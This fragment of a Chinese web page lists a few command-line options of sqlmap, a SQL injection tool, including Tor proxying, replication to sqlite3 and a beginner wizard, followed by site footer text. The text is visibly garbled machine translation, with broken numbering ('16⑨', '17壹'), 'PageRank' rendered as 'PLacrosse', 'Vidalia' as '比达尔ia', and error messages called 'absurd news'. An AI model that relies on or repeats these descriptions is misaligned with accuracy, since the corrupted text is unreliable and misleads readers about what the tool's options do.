 16⑨. –page-rank 谷歌(Google) dork 结果显示网页排名(PLacrosse)

  1. –parse-errors 从响应页面解析数据库管理种类的荒谬音讯

  17壹. –replicate 复制转储的数目到1个 sqlite3 数据库  

 172. –tor 使用默许的 Tor(比达尔ia/ Privoxy/ Polipo)代理地址  

  1. –wizard 给初级用户的简易向导界面

Your Comments

近期评论

    功能


    网站地图xml地图